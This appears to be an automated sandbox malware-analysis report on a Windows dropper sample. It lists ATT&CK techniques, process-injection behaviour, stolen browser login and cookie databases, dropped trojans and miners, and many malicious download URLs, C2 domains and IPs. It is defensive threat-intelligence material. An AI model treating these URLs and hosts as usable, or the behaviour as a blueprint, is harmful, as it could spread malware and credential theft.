                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron23
                Virtualization/Sandbox Evasion
                Input Capture1
                Remote System Discovery
                Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Compromise Software Supply ChainUnix ShellLaunchdLaunchd21
                Access Token Manipulation
                Keylogging1
                System Network Configuration Discovery
                Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task612
                Process Injection
                GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                Trusted RelationshipPythonHypervisorProcess Injection1
                Rundll32
                Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 715502 Sample: l39HA25qjw.exe Startdate: 04/10/2022 Architecture: WINDOWS Score: 100 137 www.savesucpnys.xyz 2->137 139 www.mxnzvc.xyz 2->139 141 11 other IPs or domains 2->141 163 Snort IDS alert for network traffic 2->163 165 Multi AV Scanner detection for domain / URL 2->165 167 Malicious sample detected (through community Yara rule) 2->167 169 15 other signatures 2->169 12 l39HA25qjw.exe 1 5 2->12         started        15 rundll32.exe 2->15         started        17 rundll32.exe 2->17         started        19 3 other processes 2->19 signatures3 process4 signatures5 221 Uses schtasks.exe or at.exe to add and modify task schedules 12->221 21 cmd.exe 1 12->21         started        24 at.exe 1 12->24         started        26 rundll32.exe 15->26         started        28 vc_redist.x64.exe 17->28         started        31 WerFault.exe 19->31         started        33 WerFault.exe 19->33         started        35 WerFault.exe 19->35         started        process6 file7 171 Obfuscated command line found 21->171 173 Uses ping.exe to sleep 21->173 175 Drops PE files with a suspicious file extension 21->175 177 Uses ping.exe to check the status of other devices and networks 21->177 37 cmd.exe 2 21->37         started        41 conhost.exe 21->41         started        43 PING.EXE 1 21->43         started        45 conhost.exe 24->45         started        179 Writes to foreign memory regions 26->179 181 Allocates memory in foreign processes 26->181 183 Creates a thread in another existing process (thread injection) 26->183 47 svchost.exe 26->47 injected 49 svchost.exe 26->49 injected 135 C:\Windows\Temp\...\vc_redist.x64.exe, PE32 28->135 dropped 51 vc_redist.x64.exe 28->51         started        signatures8 process9 file10 95 C:\Users\user\AppData\Local\...\Fuck.exe.pif, PE32 37->95 dropped 185 Obfuscated command line found 37->185 187 Uses ping.exe to sleep 37->187 53 Fuck.exe.pif 1 37->53         started        57 tasklist.exe 1 37->57         started        59 tasklist.exe 1 37->59         started        66 4 other processes 37->66 189 Sets debug register (to hijack the execution of another thread) 47->189 191 Modifies the context of a thread in another process (thread injection) 47->191 61 svchost.exe 47->61         started        97 C:\Windows\Temp\...\VC_redist.x64.exe, PE32 51->97 dropped 99 C:\Windows\Temp\...\wixstdba.dll, PE32 51->99 dropped 64 VC_redist.x64.exe 51->64         started        signatures11 process12 dnsIp13 101 C:\Users\user\AppData\...\fwrhglUiBb.dll, PE32 53->101 dropped 193 DLL reload attack detected 53->193 195 Detected unpacking (creates a PE file in dynamic memory) 53->195 197 Found API chain indicative of sandbox detection 53->197 205 2 other signatures 53->205 68 Fuck.exe.pif 43 53->68         started        72 Fuck.exe.pif 53->72         started        157 g.agametog.com 34.142.181.181 ATGS-MMD-ASUS United States 61->157 159 208.95.112.1 TUT-ASUS United States 61->159 161 104.21.34.132 CLOUDFLARENETUS United States 61->161 103 C:\Users\user\AppData\...\cookies.sqlite.db, SQLite 61->103 dropped 105 C:\Users\user\AppData\Local\...\Login Data.db, SQLite 61->105 dropped 107 C:\Users\user\AppData\Local\...\Login Data.db, SQLite 61->107 dropped 109 C:\Users\user\AppData\Local\...\Cookies.db, SQLite 61->109 dropped 199 Query firmware table information (likely to detect VMs) 61->199 201 Installs new ROOT certificates 61->201 203 Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically) 61->203 207 2 other signatures 61->207 111 C:\ProgramData\...\VC_redist.x64.exe, PE32 64->111 dropped file14 signatures15 process16 dnsIp17 147 www.savesucpnys.xyz 207.180.199.60 CONTABODE Germany 68->147 149 www.mxnzvc.xyz 103.136.42.153, 49843, 8888 AGPL-AS-APApeironGlobalPvtLtdIN India 68->149 151 8 other IPs or domains 68->151 113 C:\Users\user\AppData\Local\Temp\...\MpVMRr, PE32 68->113 dropped 115 C:\Users\user\AppData\Local\Temp\...\FagLhQ, PE32 68->115 dropped 117 C:\Users\user\AppData\Local\Temp\...\WyFBnl, PE32+ 68->117 dropped 119 10 other malicious files 68->119 dropped 74 FagLhQ 2 68->74         started        78 EfRhfn 68->78         started        80 WyFBnl 68->80         started        82 2 other processes 68->82 file18 process19 dnsIp20 129 C:\Users\user\AppData\Local\...\FagLhQ.tmp, PE32 74->129 dropped 209 Multi AV Scanner detection for dropped file 74->209 211 Obfuscated command line found 74->211 85 FagLhQ.tmp 26 41 74->85         started        131 C:\Users\user\Documents\...fRhfn.exe, PE32 78->131 dropped 213 Drops PE files to the document folder of the user 78->213 215 Machine Learning detection for dropped file 78->215 89 WerFault.exe 78->89         started        217 Antivirus detection for dropped file 80->217 91 WerFault.exe 80->91         started        143 148.251.234.83 HETZNER-ASDE Germany 82->143 145 149.28.253.196 AS-CHOOPAUS United States 82->145 133 C:\Users\user\AppData\Local\Temp\db.dll, PE32 82->133 dropped 219 Creates processes via WMI 82->219 93 conhost.exe 82->93         started        file21 signatures22 process23 dnsIp24 153 d2l7sw81k13yby.cloudfront.net 13.32.99.56, 443, 49838 AMAZON-02US United States 85->153 155 aka.ms 23.79.157.152, 443, 49839 AKAMAI-ASUS United States 85->155 121 C:\Users\user\...\xmrBridge.dll (copy), PE32+ 85->121 dropped 123 C:\Users\user\...\unins000.exe (copy), PE32 85->123 dropped 125 C:\Users\user\...\nvrtc64_100_0.dll (copy), PE32+ 85->125 dropped 127 31 other files (30 malicious) 85->127 dropped file25

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                l39HA25qjw.exe14%VirustotalBrowse
                l39HA25qjw.exe20%ReversingLabsWin32.Trojan.Generic
                l39HA25qjw.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl100%AviraHEUR/AGEN.1210630
                C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt100%AviraHEUR/AGEN.1213343
                C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt100%AviraJS/SpyBanker.G2
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exe100%AviraHEUR/AGEN.1210630
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe100%AviraHEUR/AGEN.1213343
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe100%AviraJS/SpyBanker.G2
                C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\jame001[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe100%Joe Sandbox ML
                :y (copy)0%ReversingLabs
                :y (copy)4%MetadefenderBrowse
                C:\ProgramData\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\VC_redist.x64.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\fliu[1].exe85%ReversingLabsWin32.Backdoor.Manuscrypt
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\fliu[1].exe33%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exe46%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\setup[1].exe46%ReversingLabsByteCode-MSIL.Trojan.Scarsi
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\jame001[1].exe96%ReversingLabsWin32.Trojan.AgentTesla
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AdblockInstaller[1].exe31%ReversingLabsWin32.Trojan.Miner
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AdblockInstaller[1].exe3%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe73%ReversingLabsWin32.Trojan.RedLineStealer
                C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt73%ReversingLabsWin32.Trojan.RedLineStealer
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif4%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwrhglUiBb.dll2%ReversingLabs
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwrhglUiBb.dll0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn96%ReversingLabsWin32.Trojan.AgentTesla
                C:\Users\user\AppData\Local\Temp\XbCZmnlWlcNasYtQIR\xfQBIg46%ReversingLabsByteCode-MSIL.Trojan.Scarsi
                C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl46%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\db.dll12%ReversingLabs
                C:\Users\user\AppData\Local\Temp\db.dll11%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp2%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\PEInjector.dll4%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\PEInjector.dll3%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\_isetup\_setup64.tmp0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\is-3R3M5.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\is-3R3M5.tmp0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe (copy)0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe (copy)0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ31%ReversingLabsWin32.Trojan.Miner
                C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ3%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr85%ReversingLabsWin32.Backdoor.Manuscrypt
                C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr33%MetadefenderBrowse
                C:\Users\user\Documents\VlcpVideoV1.0.1\EfRhfn.exe96%ReversingLabsWin32.Trojan.AgentTesla
                C:\Users\user\Programs\Adblock\Adblock.exe (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\DnsService.exe (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\MassiveService.dll (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\MiningGpu.dll (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\SysGpuInfoEx.dll (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\SysGpuInfoEx.dll (copy)3%MetadefenderBrowse
                C:\Users\user\Programs\Adblock\WinSparkle.dll (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\XMRCLBridge.dll (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\XMRCLBridgeNV.dll (copy)4%ReversingLabs
                C:\Users\user\Programs\Adblock\XMRCLBridgeNV.dll (copy)0%MetadefenderBrowse
                C:\Users\user\Programs\Adblock\crashpad_handler.exe (copy)0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-03UQT.tmp2%ReversingLabs
                C:\Users\user\Programs\Adblock\is-1R9C0.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-6I5O7.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-8D8UE.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-BD3CU.tmp4%ReversingLabs
                C:\Users\user\Programs\Adblock\is-BD3CU.tmp0%MetadefenderBrowse
                C:\Users\user\Programs\Adblock\is-ESNDI.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-NIJ7O.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-NIJ7O.tmp3%MetadefenderBrowse
                C:\Users\user\Programs\Adblock\is-OFSVL.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-Q0IO6.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-THGP9.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\is-UM4C0.tmp0%ReversingLabs
                C:\Users\user\Programs\Adblock\unins000.exe (copy)2%ReversingLabs
                C:\Users\user\Programs\Adblock\xmrBridge.dll (copy)0%ReversingLabs
                C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\wixstdba.dll0%ReversingLabs
                C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\wixstdba.dll0%MetadefenderBrowse
                C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe0%ReversingLabs
                C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe0%ReversingLabs
                SourceDetectionScannerLabelLinkDownload
                37.0.DMLnyt.dc0000.5.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.5.unpack100%AviraJS/SpyBanker.G2Download File
                37.0.DMLnyt.dc0000.3.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.3.unpack100%AviraJS/SpyBanker.G2Download File
                35.2.svchost.exe.2546f070000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                20.2.Fuck.exe.pif.2750000.4.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
                37.0.DMLnyt.dc0000.0.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.0.unpack100%AviraJS/SpyBanker.G2Download File
                29.0.EfRhfn.3c0000.0.unpack100%AviraHEUR/AGEN.1231516Download File
                40.2.svchost.exe.1f19b330000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                35.0.svchost.exe.2546f070000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                37.2.DMLnyt.dc0000.0.unpack100%AviraHEUR/AGEN.1213343Download File
                37.2.DMLnyt.dc0000.0.unpack100%AviraJS/SpyBanker.G2Download File
                29.0.EfRhfn.3c0000.4.unpack100%AviraHEUR/AGEN.1231516Download File
                29.0.EfRhfn.3c0000.2.unpack100%AviraHEUR/AGEN.1231516Download File
                38.2.svchost.exe.1980bc00000.4.unpack100%AviraHEUR/AGEN.1239265Download File
                38.2.svchost.exe.19809ad0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                37.0.DMLnyt.dc0000.4.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.4.unpack100%AviraJS/SpyBanker.G2Download File
                29.0.EfRhfn.3c0000.1.unpack100%AviraHEUR/AGEN.1231516Download File
                37.0.DMLnyt.dc0000.2.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.2.unpack100%AviraJS/SpyBanker.G2Download File
                40.0.svchost.exe.1f19b330000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                34.2.rundll32.exe.3440000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
                29.0.EfRhfn.3c0000.3.unpack100%AviraHEUR/AGEN.1231516Download File
                37.0.DMLnyt.dc0000.1.unpack100%AviraHEUR/AGEN.1213343Download File
                37.0.DMLnyt.dc0000.1.unpack100%AviraJS/SpyBanker.G2Download File
                29.0.EfRhfn.3c0000.5.unpack100%AviraHEUR/AGEN.1231516Download File
                SourceDetectionScannerLabelLink
                b.dowgmeb.com18%VirustotalBrowse
                cdn.computewall.com1%VirustotalBrowse
                a.dowgmea.com5%VirustotalBrowse
                2jhbdhjfsdf2.monster14%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://cdn.computewall.com/adblockfast/marketator/windows-0.3.2/AdblockInstaller.exe0%Avira URL Cloudsafe
                https://a.dowgmea.com/ele3seQjY0QMdbuzcmH4UpZjBK6WzKu1lJyjLlRgrPJc4OpWiLo3P91NBec1Y7co7TKo2u3ei0%Avira URL Cloudsafe
                https://api.joinmassive.com/telemetry?source=installer&env=prod0%Avira URL Cloudsafe
                http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk0%Avira URL Cloudsafe
                https://api.joinmassive.com/apps/config?productId=adblockfast&distId=marketator&anonId=11389406-0377-47ed-98c7-d564e683c6eb0%Avira URL Cloudsafe
                https://mnh.ajn322bb.com/files/pe/pb1105.exe0%Avira URL Cloudsafe
                https://cdn.computewall.com/y0%Avira URL Cloudsafe
                https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exen0%Avira URL Cloudsafe
                https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exep0%Avira URL Cloudsafe
                https://2jhbdhjfsdf2.monster/0%Avira URL Cloudsafe
                https://pp.abcgameabc.com/api4.php0%Avira URL Cloudsafe
                http://109.206.241.33/files/Hadi.config.CfgEncFile0%Avira URL Cloudsafe
                https://api.joinmassive.com/dist/match?productId=adblockfast&distId=marketator&downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&installerSessionId=113894061664863815&pid=767&installType=installPath0%Avira URL Cloudsafe
                https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeC0%Avira URL Cloudsafe
                https://www.remobjects.com/ps0%Avira URL Cloudsafe
                https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeY0%Avira URL Cloudsafe
                https://a.dowgmea.com/gamexyz/3004/random.exe0%Avira URL Cloudsafe
                https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe_0%Avira URL Cloudsafe
                https://2jhbdhjfsdf2.monster/search_hyperfs_213.exe100%Avira URL Cloudmalware
                https://www.innosetup.com/0%Avira URL Cloudsafe
                http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP100%Avira URL Cloudmalware
                http://www.mkpmc.com0%Avira URL Cloudsafe
                https://b.dowgmeb.com/0%Avira URL Cloudsafe
                http://www.savesucpnys.xyz/mp3studios_6.exey100%Avira URL Cloudphishing
                https://cdn.computewall.com/adblockfast/marketator/windows/appcast.xml0%Avira URL Cloudsafe
                http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exeown/u4vYmgIN4sqk0fc498100%Avira URL Cloudphishing
                https://api.joinmassive.com/postback/adblockfast/marketator?downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&pid=7670%Avira URL Cloudsafe
                http://www.mkpmc.com/Home/Index/getdata0%Avira URL Cloudsafe
                https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exeJ~?0%Avira URL Cloudsafe
                https://mnh.ajn322bb.com/files/pe/pb1105.exewlcUivWMjcwg0%Avira URL Cloudsafe
                http://xv.yxzgamen.com/logo.png0%Avira URL Cloudsafe
                http://109.206.241.33/files/Hadi.config.CfgEncFileP0%Avira URL Cloudsafe
                http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exe100%Avira URL Cloudphishing
                http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk10%Avira URL Cloudsafe
                http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqk/0%Avira URL Cloudsafe
                https://adblockfast.com//license0%Avira URL Cloudsafe
                https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exe0%Avira URL Cloudsafe
                https://api.joinmassive.com/telemetry/ping?source=app&productId=adblockfast&distId=marketator&env=prod0%Avira URL Cloudsafe
                http://www.savesucpnys.xyz/mp3studios_6.exeLMEMX100%Avira URL Cloudphishing
                https://joinmassive.com/terms0%Avira URL Cloudsafe
                https://2jhbdhjfsdf2.monster/search_hyperfs_213.exegn0%Avira URL Cloudsafe
                https://adblockfast.com/#contact)0%Avira URL Cloudsafe
                http://www.channelinfo.pw/index.php/Home/Index/getExeidnameexe_urlexe_namerun_valuecountry_codeaband100%Avira URL Cloudmalware
                http://www.savesucpnys.xyz/m100%Avira URL Cloudphishing
                http://www.savesucpnys.xyz/2jhbdhjfsdf2.monsterS5100%Avira URL Cloudphishing
                NameIPActiveMaliciousAntivirus DetectionReputation
                b.dowgmeb.com
                188.114.97.3
                truefalseunknown
                cdn.computewall.com
                172.67.68.80
                truefalseunknown
                a.dowgmea.com
                188.114.96.3
                truefalseunknown
                2jhbdhjfsdf2.monster
                188.72.236.239
                truefalseunknown
                www.mxnzvc.xyz
                103.136.42.153
                truetrue
                  unknown
                  g.agametog.com
                  34.142.181.181
                  truetrue
                    unknown
                    mnh.ajn322bb.com
                    104.21.25.158
                    truefalse
                      unknown
                      d2l7sw81k13yby.cloudfront.net
                      13.32.99.56
                      truefalse
                        high
                        aka.ms
                        23.79.157.152
                        truefalse
                          high
                          xv.yxzgamen.com
                          188.114.96.3
                          truefalse
                            unknown
                            www.savesucpnys.xyz
                            207.180.199.60
                            truetrue
                              unknown
                              api.joinmassive.com
                              unknown
                              unknowntrue
                                unknown
                                UWQEfDCLagTOQundi.UWQEfDCLagTOQundi
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://mnh.ajn322bb.com/files/pe/pb1105.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.joinmassive.com/apps/config?productId=adblockfast&distId=marketator&anonId=11389406-0377-47ed-98c7-d564e683c6ebfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.computewall.com/adblockfast/marketator/windows-0.3.2/AdblockInstaller.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.mxnzvc.xyz:8888/down/u4vYmgIN4sqkfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.joinmassive.com/telemetry?source=installer&env=prodfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.joinmassive.com/dist/match?productId=adblockfast&distId=marketator&downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&installerSessionId=113894061664863815&pid=767&installType=installPathfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pp.abcgameabc.com/api4.phpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aka.ms/vs/17/release/vc_redist.x64.exefalse
                                    high
                                    http://109.206.241.33/files/Hadi.config.CfgEncFilefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.dowgmea.com/gamexyz/3004/random.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://2jhbdhjfsdf2.monster/search_hyperfs_213.exefalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://cdn.computewall.com/adblockfast/marketator/windows/appcast.xmlfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.joinmassive.com/postback/adblockfast/marketator?downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&pid=767false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://iplogger.org/1nRWH4false
                                      high
                                      http://xv.yxzgamen.com/logo.pngfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.savesucpnys.xyz/mp3studios6/mp3studios_6.exefalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cf43570.tmweb.ru/setup.exefalse
                                        high
                                        https://api.joinmassive.com/telemetry/ping?source=app&productId=adblockfast&distId=marketator&env=prodfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dfgrthres.s3.eu-west-3.amazonaws.com/aysdg930false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exenFuck.exe.pif, 00000014.00000002.47257407587.0000000000B69000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://iplogger.org/1tUnk7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.discordapp.com/-Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://iplogger.org/1nhVH4Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://iplogger.org/12QMs7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.discordapp.com/attachments/982710296206536716/1020079721150685314/NotGraduate.exeDJohycFuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://sm.ms/api/v2/upload?inajax=1https://sm.ms/api/v2/upload?inajax=1Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://iplogger.org/1E2ma7Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://a.dowgmea.com/ele3seQjY0QMdbuzcmH4UpZjBK6WzKu1lJyjLlRgrPJc4OpWiLo3P91NBec1Y7co7TKo2u3eiFuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.computewall.com/adblockfast/marketator/windows/AdblockInstaller.exepFuck.exe.pif, 00000014.00000002.47258299554.0000000000B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cf43570.tmweb.ru/0Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
